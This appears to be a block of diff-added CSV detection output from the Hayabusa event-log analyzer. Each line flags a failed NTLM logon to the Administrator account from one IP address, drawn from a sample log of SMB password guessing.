+2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3TlapK211UT8SO0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mzzw3uPkn2cgtmlF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aPnfUjwJei5E5BD7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mm1k0eeKAYokIbDg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w8TDNcJ3LMyNtUe1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogKKslkdXvc9f130 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgoy6gMfe5N0UiP5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lfjf3d6I8TsBOzvc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vs8DG8s81oOwYoI7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LFkgN1aDoYkQ4qrT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KMwLokYpcFIYHegd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6oKradBV4ERsQnKs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0qPzlzfmgrbYTKqQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKYlBm2lhobHzbjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DBMu96oqO9tb3f4O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tO04Q3eYdzyuy51v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FrIa2UrSrfdhkDCx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: axhhyMrGl95O16Vg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: atjvfi8QeEDluhL2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HPBZKUiiKeyQwSr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2SmitfyjO4mxqw5E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nrq1g8ktTQbPTXqn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 943GV3t1muba5IQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HPVd28zf85AxdGqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D6evoSSxcKkHspuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C4fznmrnIdUH7DzG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AwrrYjUV41P0K5Jh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4RBZrALEnH5BKP9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LU6uWH4gs4iHP7rV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCfhZDAH8ufk77zN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TE9pw4UeRldGeKVc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8PKE05MqxE5TwXT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GIE5fmddOPBbCM3u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pveyo4Czx6KWKCGn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zPyyHaRnBec7Qg2x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3b8mudJp5mdkiEW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Y6mjLaCzR28Q2qK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dMsNKWEjeCYYQVqw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I7c5fENhkwO6QfEU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cr1wAeMhPgVpwV82 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fErpp9Ww6LO37C9k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CYsNpBsGT5zOKe3p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgzUk1Dmttm4AQ3s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hp0c3YYyOSJuBHCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gkis4H1MIQPHUwqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lb6mH03qKLb8O7Dz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J10xEmhRNWfJ5FCI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Dujj8A7wwzAwzCp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NVDE3fIoUQfLn3cd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UlD48O0XpFUnuSmo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KyTPKuspADmLpv0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BdIAPiH32ZbmCgTK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1dEiN2xOA4E9Wl5p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fBeAez2fLjXB0dk3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gQ45aeMDc3Snabvv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWSYdr4lJlhCLMMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RgxHY7072aUCdfa0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9yKhEodJDTVCGdIG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z0odyPQmvkGRNWZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b5uRpG0fxCK75DPV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d9dcEzpJRW5YA8Bj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hv3B9bwB1YIaBa6N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lJf9Obml4aVxE5zp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mvnSOaRSkGU6Uf5q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JSAkZsZsv0SaLKaO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r6rnM6QbwfbbrcGy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RX0GW7K5wdQJUx4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xm7CpD5i735McsvS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bHxjZsnR25J47Ez8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1JWj91m79FyykH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h9i0GncOzpz5REWp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BODZRJ6G3xxw29VJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJ2lq4piINfmI7Qe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NqDeXdOitJ3WY8w4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
